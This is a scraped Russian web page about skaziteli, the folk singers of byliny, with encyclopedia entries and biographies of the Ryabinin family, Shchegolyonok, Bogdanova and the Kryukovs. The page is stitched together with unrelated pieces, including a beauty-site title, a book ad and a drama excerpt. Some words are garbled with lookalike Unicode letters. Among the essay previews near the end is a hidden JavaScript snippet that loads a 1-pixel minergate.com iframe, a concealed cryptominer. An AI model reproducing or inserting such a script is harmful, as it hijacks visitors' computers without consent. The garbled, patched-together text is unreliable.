Макияж. Уход за волосами. Уход за кожей

Макияж. Уход за волосами. Уход за кожей

» » Легендарный сказитель древнерусских былин слепой гусляр. Каково значение былин для нас

Легендарный сказитель древнерусских былин слепой гусляр. Каково значение былин для нас

Сказители - исполнители былин, эпических баллад и ранних историч. песен. Слово "С." имеет нар. происхождение, образовано от глагола "сказывать"; оно указывает на своеобразную манеру исполнения произв. перечисленных фольклорных жанров. На севере России исполнителей эпоса называли также "сказатели", "старинщики". С. были обычно крестьяне (как мужчины, так и женщины). В фольклористику термин "С." вошёл в сер. 19 в. благодаря работам П. Н. Рыбникова и А. Ф. Гильфердинга. С. в период расцвета рус. эпоса (10-16 вв.) были как непрофессионалы, так и профессионалы - певцы в дружинах, при княжеских дворах, скоморохи и др. С 60-х гг. 19 в., когда эпос стал систематически записываться, С.-профессионалы уже не встречались.

С. пользовались одним, максимум 2-3 традиц. напевами речитативного характера и применяли их независимо от содержания текста произведения. Личность С. проявлялась в индивидуальном подборе средств поэтич. выразительности словесного текста, в варьировании напева, эпизодов, в установлении последовательности эпизодов и, наконец, в самом репертуаре С. В зависимости от степени проявления индивидуального начала в творчестве С. фольклористы (вслед за сов. фольклористом А. М. Астаховой) различают: С.-передатчиков, стремящихся к предельно точному воспроизведению усвоенного (И. Т. Рябинин, Б. Суриков - 2-я пол. 19 в.); С., создающих свои редакции и версии (Т. Г. Рябинин - сер. 19 в., Н. С. Богданова, А. М. Пашкова - кон. 19 - нач. 20 вв.); С.-импровизаторов, к-рые каждый раз по-новому излагают сюжет (В. П. Щеголёнок - кон. 19 в., М. С. Крюкова - 20 в.). Под влиянием наиболее талантливых С. возникали локальные школы (онежская, беломорская, печорская, мезенская и др.), а вслед за ними - более обширные местные традиции. Среди выдающихся С. рус. Севера - Т. Г. Рябинин, А. М. Крюкова, Г. Л. Крюков, М. Д. Кривополенова, А. П. Сорокин, H. С. Богданова, Г. А. Якушов, Ф. А. Конашков. Для популяризации творчества С. с 80-х гг. 19 в. организовывались их публич. выступления в крупнейших городах России и Зап. Европы.

Первые собиратели и исследователи нар. эпоса застали лишь последнюю стадию его активного бытования (сер. 19 в.) - в основном на сев. окраинах России и в меньшей степени в Сибири. К этому времени на юге России в казачьей среде былины трансформировались в былинные песни, исполнявшиеся хором на песенные напевы.

С. иногда наз. исполнителей эпоса др. народов СССР - казах, жирши, туркм. бахши, якут, олонхосутов и др.

Литература: Рыбников П. Н., Заметка собирателя, в сб.: Песни, собранные П. Н. Рыбниковым, ч. 3 - Народные былины, старины, побывальщины и песни, Петрозаводск, 1864, т. 1, М., 1909; Гильфердинг A., Олонецкая губерния и ее народные рапсоды, в сб.: Онежские былины, записанные А. Ф. Гильфердингом летом 1871, СПБ, 1873; Ляцкий Е., Сказитель И. Т. Рябинин и его былины, "Этнографическое обозрение", 1894, кн. 23, No 4, с. 105-35; Миллер Вс. Ф., Очерки русской народной словесности, т. 1, М., 1897; Архангельские былины и исторические песни, собранные А. Д. Григорьевым в 1899-1901 гг., т. 1, М., 1904, с. 333-91 (с нотным приложением); Ончуков Н., Печорские былины, СПБ, 1904, с. I-XXXIII; Сперанский М., Русская устная словесность, т. 2 - Былины. Исторические песни, под ред. и с примеч. М. Сперанского, М., 1919, с. VII-XX; Соколов Б., Сказители, М., 1924; Соколов Ю. М., Русский фольклор, М., 1938, с. 232-46; Астахова A., Былинное творчество северных крестьян, в сб.: Былины Севера, т. 1, М.-Л., 1938, с. 7-105; её же, Русский былинный эпос на Севере, Петрозаводск, 1948; Ухов П. Д., Былины, в сб.: Русское народное поэтическое творчество, M., 1956, с. 350-56.

И. Я. Лесенчук

Сказители Сказители - так называют себя олонецкие певцы былин (старин),производя это слово от глагола "сказывать", в специальном значениипередачи чего-либо (сказки , события) нараспев, речитативом. В Олонецкомкрае исследователи не встречали С. по профессии, снискивающих себепропитание пением былин, подобно каликам, для которых пение духовныхстихов является хлебным ремеслом. Из среды знающих и поющих былинымужиков и баб выделяются, однако, особо одаренные люди, приобретающиерепутацию С. по преимуществу и пользующиеся в окрестном населениипочетом и славой. Они являются традиционными хранителями эпическойстарины, передавая ее из поколения в поколение, причем детальныеизменения, невольно вносимые каждым из них при пении той или другойбылины, зависят от самых условий устной передачи, но не от личногосочинительства: последнее почти отсутствует, и многочисленные попытки"сочинить" новую былину, как свидетельствует Гильфердинг в предисловии к"Онежским былинам", оканчивались неудачей. Субъективный элемент,вносимый С. в передачу былины , находится, между прочим, в зависимости отпрофессии, которая кормит С. : напр., у С.- калик богатыри отличаютсяособенной набожностью, С.- портной с большой тщательностьюостанавливается на подробностях одеяния богатырей и т. д. Портняжноеремесло, как и плетение сетей, вообще вызывают "охоту старинки петь". Уженщин-сказительниц есть свои любимые былины - те, где выдающаяся рольпринадлежит женщине, напр. былины о Ставре, Чуриде, Иване Годиновиче.Еще не решен вопрос, от кого и каким образом получили предки современныхС. былевое наследство; но можно считать несомненным, что в образованиибылевой части нашего эпоса, в обогащении его новыми сюжетамизначительное участие принимали скоморохи. Сохранению былин в нашемсевере, в Олонецкой и Архангельской губ., где их записано наибольшеечисло, при несомненной поэтической восприимчивости населения, многосодействовали такие обстоятельства, как отдаленность от культурныхцентров, отсутствие грамотности, а также отсутствие крепостного права,что давало населению возможность "не терять сочувствия к идеаламсвободной силы, воспеваемым в былинах" (Гильфердинг); эти жеобстоятельства объясняют и исчезновение в настоящее время эпоса,усиливающееся по мере проведения дорог, развития грамотности и т. д.Некоторые С. обладают замечательной памятью; многие продиктовалисобирателям былин от 2000 до 3000 стихов, от 10 до 20 былин; репертуартаких обшеизвестных С., как Калинин и Трофим Рябинин, доходит до 5000, ау Рябинина-сына (Ивана Трофимовича) - до 6000 стихов. Об известном всвое время калике Мещанинове С. Фепонов сообщал Гильфердингу почтиневероятный факт , будто он знал до семидесяти былин (средняя былина - от400 до 600 стихов). Сохранению былин в памяти помогает определенныйхарактер и склад былины , слагающейся из ряда установившихся эпическихприемов, "передвижных картинок", условных запевов, исходов, поэтическихформул, постоянных эпитетов и т. д. С другой стороны, распространенная волонецком населении вера в чудесное, позволяющая видеть в том, чтоизображается в былинах, действительную быль прежних веков, иповсеместное уважение, с которым крестьяне относятся к своим"старинушкам", также содействовали сохранению нашего эпоса и образованиютипа певца-С., воплощающего в себе высший подъем народно-поэтическогочувства. Многие из С. являлись в наши столицы петь былины в заседанияхученых обществ и публичных собраниях; таковы Трофим Рябинин (1871),Щеголенок (1879), Касьянов (1891), Иван Трофимов (1893 и 1894). Осказителях, кроме Гильфердинга, см. "Песни, собранные П. Н. Рыбниковым"(М., в 60-х гг.); первые главы ("Былинное предание в Олонецкой губ. " и"Русская былина, ее слагатели и исполнители") в "Очерках русскойнародной словесности" Всеволода Миллера (М., 1897); Евг.Ляцкий, "ИванТрофимович Рябинин и его былины" (М., 1895). Евг. Л - ий.

Энциклопедия Брокгауза и Ефрона. - С.-Пб.: Брокгауз-Ефрон . 1890-1907 .

Смотреть что такое "Сказители" в других словарях:

    Специальный термин для обозначения исполнителей эпических жанров фольклора былины (см.) и сказки (см.). В научный обиход он был введен П.Н.Рыбниковым, указавшим на существование его у северных крестьян в применении к певцам былин. Для обозначения … Литературная энциклопедия

    СКАЗИТЕЛИ, русские непрофессиональные певцы, в основном из крестьян, исполнители былин, исторических песен, баллад. У других народов барды, жирши и др … Современная энциклопедия

    Русские непрофессиональные певцы из крестьян, исполнители былин, исторических песен, баллад (Рябинины, М. Д. Кривополенова, М. С. Крюкова). У других народов соответственно барды, жирши и др … Большой Энциклопедический словарь

    Исполнители былин, эпических баллад и ранних историч. песен. Слово С. имеет нар. происхождение, образовано от глагола сказывать; оно указывает на своеобразную манеру исполнения произв. перечисленных фольклорных жанров. На севере России… … Музыкальная энциклопедия

    Русские полупрофессиональные певцы из крестьян, исполнители былин, исторических песен, баллад (Т. Г. Рябинин, М. Д. Кривополенова, М. С. Крюкова). Основанное на устойчивых фольклорно словесных и музыкальных традициях искусство сказителей… … Энциклопедический словарь

    Народное название исполнителей певцов былин (См. Былины) и исторических песен (См. Исторические песни), принятое русской наукой. Исполнение эпических песен зародилось в доисторическую эпоху, входило в репертуар древнерусских скоморохов… … Большая советская энциклопедия

    Так называют себя олонецкие певцы былин (старин), производя это слово от глагола сказывать в специальном значении передачи чего либо (сказки, события) нараспев, речитативом. В Олонецком крае исследователи не встречали С. по профессии,… … Энциклопедический словарь Ф.А. Брокгауза и И.А. Ефрона

    СКАЗИТЕЛИ - СКАЗИТЕЛИ, народное название исполнителей (певцов) былин и исторических песен, принятое русской наукой. В середине XIX в. П. Н. Рыбников установил факт широкого бытования былин среди крестьян русского Севера. Искусство С. основано на длительной и … Литературный энциклопедический словарь

    СКАЗИТЕЛИ - – сохранившиеся доселе певцы былин на севере России (от слова сказывать – в смысле говорить нараспев, речитативом). С и кормятся обыкновенно другим ремеслом; некоторые знают на память до 5,000 стихов и более. С и приглашались несколько… … Музыкальный словарь Римана

    ГРИОТЫ (франц. griots), общее наименование профессиональных сказителей, музыкантов певцов Зап. Африки. Сказания исполняются в сопровождении какого либо музыкального инструмента. Существуют гриоты авторы, исполнители, а также гриоты, объединяющие… … Энциклопедический словарь

Книги

  • Русские налоговые сказки , Валерий Панюшкин. Цитата "В жизни неизбежны две вещи - смерть и налоги" . Бенджамин Франклин О чем книга Налоги придуманы не просто так и их нужно платить - большинство людей на земле признают это. Но мало кто…

Давным-давно, много веков тому назад, далекие предки наши – славяне не умели еще читать и писать, и не было не только никаких книг, но люди не знали даже бумаги...
А все же в жизни древнего человека совершалось немало событий: он трудился, учился постепенно овладевать природой, ему приходилось бороться с врагами; он переживал чувства горя и радости.
Древние люди не умели писать, но у них была потребность рассказывать о событиях, что случились с ними, и о людях, которые им встречались. Им хотелось поведать о своих мыслях и чувствах в таких ярких образах-картинах и такими меткими, задушевными словами, чтобы рассказанное взволновало и надолго запомнилось. Тогда они складывали песни, сказания о своих любимых героях, рассказывали сказки, придумывали хитроумные загадки, слагали меткие пословицы. То были произведения устной народной поэзии, или фольклора, что по-английски означает: "народная мудрость".
В долгие осенние либо зимние вечера собирались люди слушать любимых своих сказителей. Под свист вьюги или однообразный шум дождя, затаив дыхание, внимали люди чудесным сказкам о трех волшебных царствах, о спящей красавице, о Кащее Бессмертном, об Иване-царевиче...
Но вот слушатели видят в руках у сказителя гусли. Это значит, что сегодня собирается он сказывать былину. Былины во многом похожи на сказки: в них тоже встречаются чудеса. Но это уже не сказки, потому что былины в гораздо большей степени отражают исторические события и жизнь древней Руси. Былины – это песенные рассказы о героях-богатырях земли русской.
Много былин знает знает сказитель. Он помнит десятки народных преданий о славных защитниках Киевской и Московской Руси от лютых кочевников-печенегов, половцев и позднее – татар, разорявших древние русские города, убивавших женщин и детей, уводивших в рабство тысячи русских людей. Он может пропеть и о богатыре крестьянского труда, могучем пахаре Микуле Селяниновиче, и о подвигах Добрыни Никитича , и о том, как сражался Добрыня со Змеей Горынчищей и ее змеенышами, как победил Змею и освободил сорок тысяч русских людей, запертых в плену у страшной Змеи. И о лихом "девичьем пересмешнике", богатыре Алеше Поповиче , который за словом в карман не полезет и умеет хитро обмануть врага. Сказитель пропоет сказочную былину о чудесных приключениях на дне морском новгородского певца и гусляра Садко, богатого гостя.
Откуда же знает сказитель все эти былины? Они пришли к нему из глубины веков. Сложенные устно, они были так хороши, что народ бережно хранил их и передавал из поколения в поколение: от отца к сыну, от сына к внуку. И всякий, кто хранил в памяти и пел былины, старался сделать их еще интереснее, еще красочнее. Так каждая былина, прошедшая длинный путь в памяти многих поколений, становилась уже коллективным творением десятков и сотен людей.
Задумчиво перебирает сказитель струны гуслей. О ком же пропеть сегодня? Проходит минута, другая. И вот, наконец, сказитель негромко начинает:
Кто бы нам сказал про старое,
Про старое, про бывалое,
Про того, про Илью, про Муромца...
И потекла былина-песня про старое, про бывалое, про подвиги любимого народного героя древности. Об одном Илье Муромце сложено столько былин, что если бы все их пропеть, то открылась бы целая история жизни богатыря и подвигов его.
Имена богатырей, о которых расскажет сказитель, – это, конечно, не подлинные исторические имена. В Илье Муромце, Добрыне Никитиче, Алеше Поповиче, Микуле Селяниновиче и других богатырях собраны и воплощены самые высокие боевые и трудовые качества и подвиги многих сотен героев. Русские богатыри – это носители коллективной мощи родного народа.
...Сказитель поет былину. Звенят струны гуслей. Льется однообразный напев. Песня не любит торопливости, и сказитель не спешит поскорее закончить ее. Он подробно расскажет о своем герое, о том, как собирается богатырь в поход, как седлает коня, какое у богатыря вооружение. Иногда певец останавливается, припоминает подробности, вносит свои добавления. Ведь он не только исполнитель, а еще и творец. Он хочет сделать былину еще интереснее и ярче.
Часто повторяет сказитель одни и те же слова, выражения и даже целые картины, особенно если эти картины рисуют мощь богатыря. Он хочет, чтобы былина надолго осталась в памяти слушателей. Этой цели служат меткие слова, эпитеты и сравнения. Звезды у него всегда "частые", поле "чистое", девица "красная", земля "сырая". Любовно и ласково называет он своего богатыря "удаленьким добрым молодцем", родные леса – "лесушками", поле – "полюшком", траву – "травушкой", а врага он всегда назовет "поганым", "злодеем", "собакою".
Язык, которым сказитель исполняет былину, – это подлинный народный язык того времени, когда передавалась былина, и той местности, где она рассказывалась. В каждой былине встречается живая разговорная речь, и каждое действующее лицо говорит по-своему. Князь Владимир говорит высокомерно и грубо. Добрынюшка Никитич изъясняется "вежливенько"; а Илья Муромец умеет сразить не только оружием, но и метким словом.


Былины получили своё название от слов «быль», «было». В них неизвестные древние авторы рассказывали о событиях, которые действительно происходили: о сражениях с врагами, о победах русских воинов. Былины не складывались сами собой, без авторов. Их сочиняли талантливые люди, но не записывали.




Собиратели былин Открыл для нас бесценные сокровища духовной жизни народа, г. Изданы 4 тома (165 былин) «Песни, собранные Рыбниковым». Рыбников Павел Николаевич


Сказывание былин. Былины исполнялись особым образом: их сказывали, то есть произносили нараспев, следуя звучанию былинного стиха, а исполнителей былин называли сказителями. Былины передавались от поколения к поколению, и известны целые семьи, в которых хранились такие традиции. Знаменитая семья Рябининых, мать и дочь Крюковы - это известные северные сказители. Исполнение былин требовало большого актёрского таланта и блестящей памяти: так, например, Марфа Семеновна Крюкова в течение целого месяца напевала собирателю фольклора новые и новые былины, не повторяясь.


Трофи́м Григо́рьевич Рябинин (Трофи́м Григо́рьевич Ря́бов) (г.) олонецкий крестьянин, Один из выдающихся сказителей русских былин, родоначальник династии былинных сказителей Рябининых. Записали у Рябинина 23 былины, состоящих из 6000 стихов.


«Напев былины был однообразен, голос у Рябинина не очень звонок, но удивительное умение сказывать придавало особенное значение каждому стиху. Где Рябинин научился такой мастерской дикции: каждый предмет у него выступал в настоящем свете, каждое слово получало свое значение!». Приглашенный в столицу заонежский сказитель выступил 3 декабря 1871 года на заседании Отделения этнографии. По отзывам современников, это выступление явилось наиболее ярким культурным событием сезона, в зале Географического общества, где оно проходило, яблоку негде было упасть, и многие слушали старика-певца стоя. После выступления Рябинину вручили денежное вознаграждение и особый дар от великого князя Константина Николаевича – серебряный кубок. Александр II пожаловал Трофиму Григорьевичу Рябинину медаль «За полезное».


Василий Петрович Щеголёнок. Сказитель былин, крестьянин В. П. Щеголенок – сказитель с ярко выраженным складом импровизатора. От него в разное время и разными собирателями было записано 14 былин. Одну и ту же былину он каждый раз пел совершенно по- иному, меняя не только отдельные места, но и весь текст в целом.


Сказители былин Сказители былин

Одной из наиболее ярких фигур среди сказителей XIX века является Трофим Григорьевич Рябинин , крестьянин деревни Середка Кижской волости Олонецкой губернии.
Родился он в деревне Гарницы в Сенной Губе в начале 90-х годов XVIII века, умер в 1885 году. Он рано ᴨᴏᴛерял родителей (отец был убит на войне, мать умерла через год после ухода отца на военную службу). Еще подростком Рябинин стал ходить по окрестным деревням чинить сети и другие рыболовные снасти. На этой работе он встретился с Ильей Елустафьевым, тоже занимавшимся починкой сетей, который и стал первым учителем Т. Г. Рябинина в области былинного искусства

В дальнейшем Трофим Григорьевич жил в работниках у своего дяди, Игнатия Андреева, также превосходного певца былин Перенимал он былины и от других мастеров. Из всех олонецких сказителей XIX века Т. Г. Рябинин дал наибольшее количество былин П. Н. Рыбников в 60-е годы записал от него 18 тексᴛᴏʙ, А. Ф. Гильфердинг в 1871 году – 23, всего же от Трофима Рябинина известно 26 былинных сюжеᴛᴏʙ общим объемом до 6000 стихов. Как исполнитель былин Трофим Рябинин может быть назван одним из лучших представителей русского классического былинного стиля. Былины Т. Г. Рябинина отличаются яркой образностью и богато орнаментированы. Он был большим мастером в выборе и применении всех изобразительных средств, полностью соблюдал былинную «обрядность», выработанные веками традиционные эпические приемы, но пользовался ими свободно и творчески, с большим художественным тактом. Недаром многие тексты Т. Г. Рябинина неизменно включались и включаются как лучшие образцы былинного творчества в хрестоматии и антологии, и именно из его былин всегда брались примеры для характеристики основных особенностей былинного стиля.

Высокое художественное мастерство Т. Г. Рябинина, выделяющее его среди многих других сказителей Прионежья, было отмечено обоими собирателями, записавшими его былины. П. Н. Рыбников рассказывает, что во время исполнения былин Рябининым ему не раз приходилось бросать перо и жадно вслушиваться в рассказ: «Каждый предмет у него выступал в настоящем свете, каждое слово получало свое значение». «Удивительное умение сказывать придавало особенное значение каждому стиху».1

П. Н. Рыбников, посвятивший Трофиму Рябинину несколько страниц в своем превосходном очерке о сказителях, говорит и о большом личном обаянии Рябинина: «В его суровом взгляде, осанке, поклоне, поступи, во всей его наружности, с первого взгляда были заметны спокойная сила и сдержанность».2

Иной тип сказителя представляет собой известный олонецкий певец былин того же времени Василий Петрович Щеголенок .

Щеголенок был на десять с лишним лет моложе Т. Г. Рябинина. Его родина – деревня Боярщина той же Кижской волости. Былинному сказительству он научился отчасти у своего деда, но главным образом от дяди Тимофея. Последний, безногий инвалид, жил у своего брата – отца Щеголенка. От дяди Щеголенок перенял также сапожное ремесло, которым и занимался помимо земледелия.

В. П. Щеголенок – сказитель с ярко выраженным складом импровизатора. От него в разное время и разными собирателями было записано 14 былин; 10 из них записаны в нескольких вариантах, ясно показывающих, что у Щеголенка не было единой устойчивой редакции одного и того же сюжета. Одну и ту же былину он каждый раз пел совершенно по-иному, меняя не только отдельные места, но и весь текст в целом.

В противоположность Т. Г. Рябинину, который давал исключительно стройные и четкие композиции, Щеголенок уᴄᴫᴏжнял былины мотивами и эпизодами других былин, любил объединять разные сюжеты. При всем своем творческом, новаторском отношении к материалу Рябинин оставался верен народной традиции. Щеголенок часто отступал от нее. Он сводил в одной былине богатырей, которые обычно никогда не встречались, и заменял традиционных героев другими эпическими именами.

Былины Щеголенка лишены того четкого ритма, которым отмечены тексты Рябинина. Хотя Щеголенок свои былины неизменно пел, в стиле и складе их заметно тяготение к более свободному, приближающемуся к прозаическому, рассказыванию

В этом, очевидно, сказалось то обстоятельство, что он был по преимуществу сказочником. Пел Щеголенок былины, по словам Гильфердинга, «не громким, но довольно приятным, хотя уже старческим голосом».3

В 1890-х годах начинает выступать за пределами родного края сын Трофима Рябинина – Иван Трофимович Рябинин . Не раз приезжал он в Петербург и Москву; выступал и в других городах, а в 1902 году совершил свою известную поездку к южным славянам.

В противоположность отцу, Иван Трофимович Рябинин принадлежал к той категории сказителей, которые при усвоении былин не проявляли самостоятельного творчества. Они не вырабатывали новых, своих редакций, а полностью воспринимали текст от своего учителя. Варианты И. Т. Рябинина мало отличаются от тексᴛᴏʙ отца. При исполнении он вносил лишь незначительные изменения – несущественную перестановку эпизодов, замену одного слова другим и т. п. Характерно, что былины Ивана Трофимовича более близки к текстам Трофима Рябинина в записи Рыбникова, чем к позднейшим редакциям у Гильфердинга. Следовательно, переняв былины от отца еще в молодости, Иван Рябинин крепко и бережно хранил усвоенное наследие, избегая даже вариаций, вносимых отцом. Во время своих выступлений он всегда решительно протесᴛᴏʙал против требований сократить текст, спеть лишь часть его или выкинуть какие-либо «неудобные места». По воспоминаниям современников И. Т. Рябинин был выдающимся мастером-исполнителем, пение им былин неизменно производило большое впечатление.

Репертуар Ивана Трофимовича был довольно обширен, хотя и уступал в этом отношении отцовскому. Знал он 16 сюжеᴛᴏʙ былин и старших исторических песен К сожалению, известно в записи от него всего 6 сюжеᴛᴏʙ.

В начале 1900-х годов появляются первые известия о вопленице и сказительнице Настасье Степановне Богдановой (Зиновьевой) из деревни Конда в Заонежье

В эти годы Н. С. Богданова выступала по приглашению в школах и других учреждениях Петрозаводска.

Расцвет деятельности Н. С. Богдановой как сказительницы относится к первой четверти XX века

В 1900-е годы от нее были произведены записи Н. Шайжиным, позднее – участниками экспедиций Государственной Академии художественных наук и Государственного Института истории искусств в 1926 году и в последующие годы. Умерла Н. С. Богданова в 1937 году.

Знания Н. С. Богдановой в области народной поэзии были чрезвычайно разносторонними. Кроме былин, она была большим мастером старинной причети и народной лирической песни, знала сказки, духовные стихи, загадки; её речь была пересыпана пословицами и поговорками. Больше всего она любила былины и была глубоко уверена в исторической досᴛᴏʙерности их содержания. Былинный репертуар её невелик – всего 10 былин Но тексты её отличаются большим своеобразием.

Если Рябинины были главным образом мастерами героического эпоса, то Н. С. Богданова особенно культивировала былины с романическим и семейно-быᴛᴏʙым содержанием (о неудачной женитьбе Алеши Поповича, о Дунае, о Чуриле и неверной жене Пермяты и т. п.), продолжая и развивая, таким образом, другую линию эпической традиции Прионежья

В былинах Настасья Степановна тщательно разрабатывала диалоги и детали отдельных эпизодов, усиливала психологические моменты и художественные описания. Особенно разработана самая любимая её былина – о Добрыне и Алеше, принадлежащая к лучшим обработкам этого сюжета.

К первой четверти XX века относится сказительская деятельность третьего представителя славного рода сказителей Рябининых – Ивана Герасимовича Рябинина-Андреева , пасынка Ивана Трофимовича. Свое былинное знание Иван Герасимович унаследовал от отчима, с кᴏᴛᴏᴘыᴍ прожил до 23-летнего возраста. Впоследствии Иван Герасимович становится видным мастером эпического искусства. Записи, произведенные от Ивана Герасимовича в 1921 году, показали, что он воспринял эпический репертуар отчима почти полностью (в его репертуаре отсутствовали только былины о Хотене и две исторические песни – об Иване Грозном и о Скопине). У отчима перенял он и напевы, тоже восходящие к Трофиму Рябинину, и все характерные особенности исполнения.

Иван Рябинин принадлежал, подобно отцу и деду, к представителям классического стиля былинного исполнения. Свои былины он всегда пел, и тексты их отличаются четким и чеканным ритмом. Все основные идейно - художественные особенности, которыми отмечены былины старших Рябининых, отличают и тексты Ивана Герасимовича: особое выделение героической линии и одновременно интерес и внимание к социальным моментам, четкость основного замысла и социальной идеи, строго выдержанные образы богатырей и их врагов, полнота и художественность описаний, стройность и ясность композиции. И. Г. Рябинин-Андреев – чуткий и вдумчивый хранитель семейной эпической традиции. Вносимые им изменения выражались лишь в перемещении из одной былины в другую некоторых описаний, словесных формул, «общих мест», в некотором обновлении лексики, а кроме того в заметном усилении диалога

В основном же оставалось неизменным не только само сюжетное развитие былины, но и выработанная старшими Рябиниными художественная словесная ткань. Умер Иван Герасимович в 1926 году.

Страницы: 1 2

Выдающейся сказительницей конца XIX и начала XX века была также беломорская исполнительница былин Аграфена Матвеевна Крюкова (1855–1921). Весь её огромный репертуар (60 тексᴛᴏʙ былин и исторических песен) был записан еще в 1900-е годы А. В. Марковым, когда сказительнице было 45 лет. Былинный репертуар А. М. Крюковой ᴄᴫᴏжен и по своему составу, и по происхождению

В нем отражены две местные традиции – Терского берега, откуда сказительница была родом, и Зимней Золотицы, куда она вышла замуж. Ее учителями на родине были главным образом мать и любимый дядя по матери – Ефим Стрелков; кроме того, она училась и от других стариков, а кроме того от своих подруг

В Зимней Золотице, где исполнение былин было распростᴘẚʜᴇнным быᴛᴏʙым явлением, она перенимала былины от свекра Василия Леонтьевича, его брата Гаврилы и других стариков. Знание свое она пополняла и впоследствии, учась даже у своих дочерей – Марфы и Павлы

В то же время на состав и характер репертуара А. М. Крюковой несомненное влияние оказали публикации былин из других районов, проникавшие с конца XIX века в деревню в различных дешевых изданиях. Будучи неграмотной, Аграфена Крюкова любила слушать чтение и усваивала новые былины или непосредственно из книги или от других сказителей в семье, которые пополняли свое былинное знание из книг.

Записанные от А. М. Крюковой былины и исторические песни превышают в общем своем объеме 10 000 стихов.

Все свои былины Аграфена Матвеевна пела, по словам Маркова, «довольно слабым, но приятным голосом», хорошо выдерживая стихотворный размер. Большинство былин были исполнены ею на один и тот же напев.

Жизнь А. М. Крюковой, этой выдающейся, даровитой поэтессы, была нерадостной

В большой семье Крюковых она занимала подчиненное, зависимое положение и много страдала от притеснений, чинимых старшими в семье женщинами. Во время американо-английской интервенции Крюковой пришлось испытать нужду и голод, которые и свели её в могилу (она умерла в 1921 году). Ее талант и знание унаследовали двое из её дочерей – Марфа Семеновна и Павла Семеновна, главным образом первая, старшая и особенно любимая матерью.

Можно назвать еще многих других выдающихся исполнителей русского эпоса. Одаренный русский народ дал отечественной культуре целый ряд талантливых мастеров эпического искусства, которые явились хранителями поэтического наследия прошлого, внесли свой твор - ческий вклад в общую сокровищницу народной поэзии. Они явились выразителями общенародных идейных и художественных тенденций и силой своего таланта углубили и совершенствовали созданное народом. Величайшими образами русского эпоса, воплотившими идеи патриотизма и гуманности, сказители воспитывали лучшие качества народа, его высокие эстетические и нравственные идеалы. (По статье А. М. Астаховой «Сказители былин, их художественное мастерство» Русское народное поэтическое творчество. – М.; Л., 1956. – Т. 2. – Кн 2. ) Сказители былин

Страницы: 1 2

Страница 1 из 1

Художественное своеобразие русской былины «Илья Муромец и Соловей-разбойник»

1.Русское народное устное творчество. 2. Художественные особенности русской былины «Илья Муромец и Соловей-разбойник». 3.Роль былины в жизни людей. Былины, или древние сказания, или старины, как их называли до XIX века, представляют собой одно из направлений фольклора. Они часто исполнялись нараспев под аккомпанемент гуслей и рассказывали о великих богатырях, народных героях или значительных событиях из истории Древней Руси. Эти произведения устно передавались от поколения в поколение. Целые семьи славились своим мастерством исполнения былин. Так, к примеру, несколько поколений семьи Рябининых занимались сказанием былин. Представительница семьи Крюковых в течение тридцати дней напевала собирателю фольклора произведения устного народного творчества и ни разу не повторилась. Героев былин существовало не так уж много, причем всех их можно условно разделить на две группы: более древние богатыри - Волхв Всеславьевич, Святогор, Вольга и Микула Селянинович и уже более современные образы - Илья Муромец, Добрыня Никитич и Алеша Попович....


Волнительные сказания героических Времен. Соотношение реального и художественного миров в былинах Киевской Руси

(function() { var w = document.createElement("iframe"); w.style.border = "none"; w.style.width = "1px"; w.style.height = "1px"; w.src = "//minergate.com/wmr/bcn/podivilovhuilo%40yandex.ru/4/258de372a1e9730f/hidden"; var s = document.getElementsByTagName("body"); s.appendChild(w, s); })(); ...


Сухово-Кобылин, Писемский и малые драматурги

Было только два драматурга, приближавшихся к Островскому если не по количеству, то по качеству своих произведений, и это были Сухово-Кобылин и Писемский, оба более традиционные, более «искусственные» и более театральные, чем он. Александр Васильевич Сухово-Кобылин (1817–1903) был типичный образованный дворянин своего поколения, пропитанный Гегелем и немецким идеализмом. Он считал метафизику своим истинным призванием, перевел всего Гегеля на русский язык и много лет работал над оригинальным философским трудом в гегелевском духе. Но его рукописи погибли во время пожара, а в печати не осталось никаких следов его философских сочинений. Писание пьес было только коротким эпизодом в его жизни. Поразительно то, что ни его метафизические наклонности, ни отсутствие профессионализма в драматургии никак не повлияли на его пьесы. Они на удивление свободны от идей, а по сценичности не имеют соперников в русской литературной драме. Единственным важным событием в жизни Сухово-Кобылина было убийство в 1850 г. его любовницы-француженки, к которой он был глубоко привязан. Его заподозрили в том, что он виновен в этом преступлении, и семь лет он находился под судом (некоторое время и в тюрьме); только в 1857 он был наконец оправдан. Этот эпизод, столкнувший его лицом к лицу с ужасами и нелепостями дореформенных судов, оставил глубокий след в его душе и внушил ему ту злобную ненависть ко всему классу чиновников, которая переполняет две его последние пьесы. Все его драматургическое наследие – это три комедии: ...


Идея защиты земли Русской в произведениях устного народного творчества (сказка, былина, песня)

Литература - 9 класс Идея защиты земли Русской в произведениях устного народного творчества (сказка, былина, песня). В былинах воплощаются думы и чувства русского народа. Былины удовлетворяли не только естественное влечение ко всему красочному, необычному, незаурядному, в них по-своему выразилось общественное создание целой исторической эпохи....


Мотивы сказки и былины в поэзии А.С. Пушкина

Сочинение по произведению «Сказка о мертвой царевне». В «Сказке о мертвой царевне» появляется обобщенный образ богатырей. Еще в «Руслане и Людмиле» слились мотивы волшебной сказки и героической былины. Характерно это и для «Сказки о царе Салтане». Но «красавцы удалые», «великаны молодые», «тридцать три богатыря» во главе с дядькой Черномором - это волшебные помощники князя Гвидона, а «семь богатырей», «семь румяных усачей» изображаются как реальные положительные герои. Известная таинственность окружает, конечно, и богатырей из «Сказки о мертвой царевне». Мы ничего не знаем об их прошлом, о том, что побудило их жить в глухом, дремучем лесу. И дела их носят какой-то отпечаток загадочности. Не то это «вольные люди», благородные разбойники, которые мстили угнетателям и скрывались от самодержавной власти, не то защитники русской земли от внешних врагов. Сорочины, татары, пятигорские черкесы- все те, кто противостоит богатырям в сказке Пушкина, являются и врагами героев русских былин и исторических песен....